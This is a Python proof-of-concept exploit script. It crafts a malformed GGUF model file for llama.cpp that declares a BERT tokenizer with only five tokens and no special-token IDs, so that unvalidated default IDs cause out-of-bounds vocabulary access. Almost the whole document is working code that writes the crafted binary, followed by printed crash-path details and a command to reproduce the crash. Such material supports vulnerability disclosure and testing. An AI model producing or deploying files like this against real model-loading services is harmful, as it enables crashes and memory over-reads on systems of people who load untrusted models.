| |
| """ |
| PoC: Heap Buffer Over-read via Unvalidated Default Special Token IDs in GGUF |
| |
| Vulnerability: In llama-vocab.cpp, when tokenizer.ggml.model = "bert", default |
| special token IDs are set to: bos=101, unk=100, sep=102, pad=0, mask=103 |
| (lines 1754-1763). These defaults are NOT validated against the actual vocabulary |
| size. If the GGUF has fewer than 104 tokens AND does not include explicit |
| tokenizer.ggml.bos_token_id (etc.) keys, the defaults remain. |
| |
| Later, print_info() at line 3352 does: |
| id_to_token.at(special_bos_id) // special_bos_id = 101, vector size = 5 |
| which throws std::out_of_range. The exception propagates up and causes model |
| loading to fail with "error loading model: vector" (the what() string of |
| std::out_of_range from vector::at). This demonstrates the unvalidated OOB access. |
| |
| Additionally, if the model somehow survived past print_info(), the special token |
| IDs would be used in tokenization (e.g., push_back(special_bos_id=101) at line |
| 3027), causing OOB embedding lookups -- a true heap buffer over-read. |
| |
| For the "llama" tokenizer variant, special_eos_id=2 with 1 token hits the even |
| more dangerous id_to_token[tid] ([] operator, no bounds check) at line 2527 |
| during the special_eog_ids loop -- true undefined behavior / heap over-read. |
| |
| This script creates a raw GGUF v3 binary file with: |
| - general.architecture = "llama" (so llama model loader is used) |
| - tokenizer.ggml.model = "bert" (triggers OOB default special token IDs) |
| - tokenizer.ggml.tokens = 5 tokens only (indices 0-4) |
| - NO tokenizer.ggml.bos_token_id or other special token ID keys |
| - All required llama architecture metadata |
| - Minimal dummy tensors to pass model loading checks |
| """ |
|
|
| import struct |
| import os |
| import sys |
| import numpy as np |
|
|
| |
| |
| |
| GGUF_MAGIC = b"GGUF" |
| GGUF_VERSION = 3 |
| GGUF_DEFAULT_ALIGNMENT = 32 |
|
|
| |
| GGUF_TYPE_UINT8 = 0 |
| GGUF_TYPE_INT8 = 1 |
| GGUF_TYPE_UINT16 = 2 |
| GGUF_TYPE_INT16 = 3 |
| GGUF_TYPE_UINT32 = 4 |
| GGUF_TYPE_INT32 = 5 |
| GGUF_TYPE_FLOAT32 = 6 |
| GGUF_TYPE_BOOL = 7 |
| GGUF_TYPE_STRING = 8 |
| GGUF_TYPE_ARRAY = 9 |
| GGUF_TYPE_UINT64 = 10 |
| GGUF_TYPE_INT64 = 11 |
| GGUF_TYPE_FLOAT64 = 12 |
|
|
| |
| GGML_TYPE_F32 = 0 |
| GGML_TYPE_F16 = 1 |
|
|
| |
| |
| |
|
|
| def write_string(f, s): |
| """Write a GGUF string: uint64 length + UTF-8 chars (no null terminator).""" |
| encoded = s.encode('utf-8') |
| f.write(struct.pack('<Q', len(encoded))) |
| f.write(encoded) |
|
|
| def write_kv_string(f, key, value): |
| """Write a KV pair with string value.""" |
| write_string(f, key) |
| f.write(struct.pack('<I', GGUF_TYPE_STRING)) |
| write_string(f, value) |
|
|
| def write_kv_uint32(f, key, value): |
| """Write a KV pair with uint32 value.""" |
| write_string(f, key) |
| f.write(struct.pack('<I', GGUF_TYPE_UINT32)) |
| f.write(struct.pack('<I', value)) |
|
|
| def write_kv_int32(f, key, value): |
| """Write a KV pair with int32 value.""" |
| write_string(f, key) |
| f.write(struct.pack('<I', GGUF_TYPE_INT32)) |
| f.write(struct.pack('<i', value)) |
|
|
| def write_kv_float32(f, key, value): |
| """Write a KV pair with float32 value.""" |
| write_string(f, key) |
| f.write(struct.pack('<I', GGUF_TYPE_FLOAT32)) |
| f.write(struct.pack('<f', value)) |
|
|
| def write_kv_bool(f, key, value): |
| """Write a KV pair with bool value (stored as int8).""" |
| write_string(f, key) |
| f.write(struct.pack('<I', GGUF_TYPE_BOOL)) |
| f.write(struct.pack('<b', 1 if value else 0)) |
|
|
| def write_kv_string_array(f, key, values): |
| """Write a KV pair with string array value.""" |
| write_string(f, key) |
| f.write(struct.pack('<I', GGUF_TYPE_ARRAY)) |
| f.write(struct.pack('<I', GGUF_TYPE_STRING)) |
| f.write(struct.pack('<Q', len(values))) |
| for v in values: |
| write_string(f, v) |
|
|
| def write_kv_float32_array(f, key, values): |
| """Write a KV pair with float32 array value.""" |
| write_string(f, key) |
| f.write(struct.pack('<I', GGUF_TYPE_ARRAY)) |
| f.write(struct.pack('<I', GGUF_TYPE_FLOAT32)) |
| f.write(struct.pack('<Q', len(values))) |
| for v in values: |
| f.write(struct.pack('<f', v)) |
|
|
| def write_kv_int32_array(f, key, values): |
| """Write a KV pair with int32 array value.""" |
| write_string(f, key) |
| f.write(struct.pack('<I', GGUF_TYPE_ARRAY)) |
| f.write(struct.pack('<I', GGUF_TYPE_INT32)) |
| f.write(struct.pack('<Q', len(values))) |
| for v in values: |
| f.write(struct.pack('<i', v)) |
|
|
| def write_tensor_info(f, name, shape, ggml_type, offset): |
| """Write tensor info entry. |
| Format: name (string), n_dims (uint32), dims[] (int64 each), type (int32), offset (uint64) |
| """ |
| write_string(f, name) |
| n_dims = len(shape) |
| f.write(struct.pack('<I', n_dims)) |
| for dim in shape: |
| f.write(struct.pack('<q', dim)) |
| f.write(struct.pack('<i', ggml_type)) |
| f.write(struct.pack('<Q', offset)) |
|
|
| def tensor_byte_size(shape, ggml_type): |
| """Calculate raw byte size of a tensor.""" |
| n_elements = 1 |
| for d in shape: |
| n_elements *= d |
| if ggml_type == GGML_TYPE_F32: |
| return n_elements * 4 |
| elif ggml_type == GGML_TYPE_F16: |
| return n_elements * 2 |
| else: |
| raise ValueError(f"Unsupported ggml_type: {ggml_type}") |
|
|
| def align_offset(offset, alignment=GGUF_DEFAULT_ALIGNMENT): |
| """Align offset to the given alignment boundary.""" |
| return ((offset + alignment - 1) // alignment) * alignment |
|
|
| |
| |
| |
|
|
| def create_poc_gguf(output_path): |
| """Create a minimal GGUF that triggers OOB access via default bert special token IDs.""" |
|
|
| |
| n_vocab = 5 |
| n_embd = 32 |
| n_head = 4 |
| n_head_kv = 4 |
| n_layer = 1 |
| n_ff = 64 |
| ctx_len = 128 |
|
|
| |
| |
| |
| tokens = ["[PAD]", "[UNK]", "[CLS]", "[SEP]", "[MASK]"] |
| token_scores = [0.0] * n_vocab |
| token_types = [0] * n_vocab |
|
|
| |
| tensors = [ |
| ("token_embd.weight", (n_vocab, n_embd), GGML_TYPE_F16), |
| ("output_norm.weight", (n_embd,), GGML_TYPE_F32), |
| ("output.weight", (n_vocab, n_embd), GGML_TYPE_F16), |
| ("blk.0.attn_norm.weight", (n_embd,), GGML_TYPE_F32), |
| ("blk.0.attn_q.weight", (n_embd, n_embd), GGML_TYPE_F16), |
| ("blk.0.attn_k.weight", (n_head_kv * (n_embd // n_head), n_embd), GGML_TYPE_F16), |
| ("blk.0.attn_v.weight", (n_head_kv * (n_embd // n_head), n_embd), GGML_TYPE_F16), |
| ("blk.0.attn_output.weight", (n_embd, n_embd), GGML_TYPE_F16), |
| ("blk.0.ffn_norm.weight", (n_embd,), GGML_TYPE_F32), |
| ("blk.0.ffn_gate.weight", (n_ff, n_embd), GGML_TYPE_F16), |
| ("blk.0.ffn_up.weight", (n_ff, n_embd), GGML_TYPE_F16), |
| ("blk.0.ffn_down.weight", (n_embd, n_ff), GGML_TYPE_F16), |
| ] |
|
|
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
|
|
| n_kv = 15 |
| n_tensors = len(tensors) |
|
|
| print(f"[*] Creating PoC GGUF: {output_path}") |
| print(f"[*] Vocabulary size: {n_vocab} tokens (indices 0-{n_vocab-1})") |
| print(f"[*] Tokenizer model: bert") |
| print(f"[*] Default special token IDs (unvalidated):") |
| print(f"[*] bos_token_id = 101 (OOB! vector size = {n_vocab})") |
| print(f"[*] unk_token_id = 100 (OOB! vector size = {n_vocab})") |
| print(f"[*] sep_token_id = 102 (OOB! vector size = {n_vocab})") |
| print(f"[*] mask_token_id = 103 (OOB! vector size = {n_vocab})") |
| print(f"[*] pad_token_id = 0 (in bounds)") |
| print(f"[*] No explicit special token ID keys in GGUF -> defaults are used") |
| print(f"[*] Number of KV pairs: {n_kv}") |
| print(f"[*] Number of tensors: {n_tensors}") |
|
|
| with open(output_path, 'wb') as f: |
| |
| |
| |
| f.write(GGUF_MAGIC) |
| f.write(struct.pack('<I', GGUF_VERSION)) |
| f.write(struct.pack('<Q', n_tensors)) |
| f.write(struct.pack('<Q', n_kv)) |
|
|
| |
| |
| |
| write_kv_string(f, "general.architecture", "llama") |
| write_kv_string(f, "general.name", "poc-bert-oob-special-tokens") |
|
|
| write_kv_uint32(f, "llama.context_length", ctx_len) |
| write_kv_uint32(f, "llama.embedding_length", n_embd) |
| write_kv_uint32(f, "llama.block_count", n_layer) |
| write_kv_uint32(f, "llama.attention.head_count", n_head) |
| write_kv_uint32(f, "llama.attention.head_count_kv", n_head_kv) |
| write_kv_uint32(f, "llama.feed_forward_length", n_ff) |
| write_kv_uint32(f, "llama.vocab_size", n_vocab) |
| write_kv_float32(f, "llama.attention.layer_norm_rms_epsilon", 1e-5) |
| write_kv_uint32(f, "llama.rope.dimension_count", n_embd // n_head) |
|
|
| |
| |
| |
| |
| write_kv_string(f, "tokenizer.ggml.model", "bert") |
|
|
| |
| write_kv_string_array(f, "tokenizer.ggml.tokens", tokens) |
| write_kv_float32_array(f, "tokenizer.ggml.scores", token_scores) |
| write_kv_int32_array(f, "tokenizer.ggml.token_type", token_types) |
|
|
| |
| |
| |
| |
| |
| |
| |
|
|
| |
| |
| |
| |
| tensor_data_entries = [] |
| current_offset = 0 |
| for tname, tshape, ttype in tensors: |
| |
| current_offset = align_offset(current_offset, GGUF_DEFAULT_ALIGNMENT) |
| size = tensor_byte_size(tshape, ttype) |
| tensor_data_entries.append((tname, tshape, ttype, current_offset, size)) |
| write_tensor_info(f, tname, tshape, ttype, current_offset) |
| current_offset += size |
|
|
| total_tensor_data_size = align_offset(current_offset, GGUF_DEFAULT_ALIGNMENT) |
|
|
| |
| |
| |
| |
| current_pos = f.tell() |
| aligned_pos = align_offset(current_pos, GGUF_DEFAULT_ALIGNMENT) |
| if aligned_pos > current_pos: |
| f.write(b'\x00' * (aligned_pos - current_pos)) |
|
|
| data_start = f.tell() |
|
|
| |
| for tname, tshape, ttype, toffset, tsize in tensor_data_entries: |
| |
| current_data_pos = f.tell() - data_start |
| target_pos = toffset |
| if target_pos > current_data_pos: |
| f.write(b'\x00' * (target_pos - current_data_pos)) |
|
|
| |
| if ttype == GGML_TYPE_F32: |
| data = np.zeros(tshape, dtype=np.float32) |
| |
| if "norm" in tname: |
| data = np.ones(tshape, dtype=np.float32) |
| f.write(data.tobytes()) |
| elif ttype == GGML_TYPE_F16: |
| data = np.zeros(tshape, dtype=np.float16) |
| f.write(data.tobytes()) |
|
|
| |
| current_pos = f.tell() |
| aligned_pos = align_offset(current_pos, GGUF_DEFAULT_ALIGNMENT) |
| if aligned_pos > current_pos: |
| f.write(b'\x00' * (aligned_pos - current_pos)) |
|
|
| file_size = os.path.getsize(output_path) |
| print(f"\n[+] Created: {output_path}") |
| print(f"[+] Size: {file_size} bytes ({file_size/1024:.1f} KB)") |
| print(f"\n[*] Crash path:") |
| print(f"[*] 1. llama-vocab.cpp:1754-1763 sets bert defaults: bos=101, unk=100, sep=102, mask=103") |
| print(f"[*] 2. llama-vocab.cpp:2130-2131 resizes id_to_token to {n_vocab} (from token list)") |
| print(f"[*] 3. llama-vocab.cpp:2215-2228 only overrides if keys EXIST in GGUF (they don't)") |
| print(f"[*] 4. llama-vocab.cpp:3352 does id_to_token.at(101) -> std::out_of_range -> abort()") |
| print(f"\n[+] To reproduce:") |
| print(f"[+] llama-cli -m {output_path} -p 'hello'") |
| print(f"[+] Expected: crash via uncaught std::out_of_range exception (abort/SIGABRT)") |
|
|
| if __name__ == "__main__": |
| output_dir = "/Users/eltarne/Documents/script/gguf_poc" |
| os.makedirs(output_dir, exist_ok=True) |
|
|
| output_path = os.path.join(output_dir, "poc_special_token_oob.gguf") |
| create_poc_gguf(output_path) |
|
|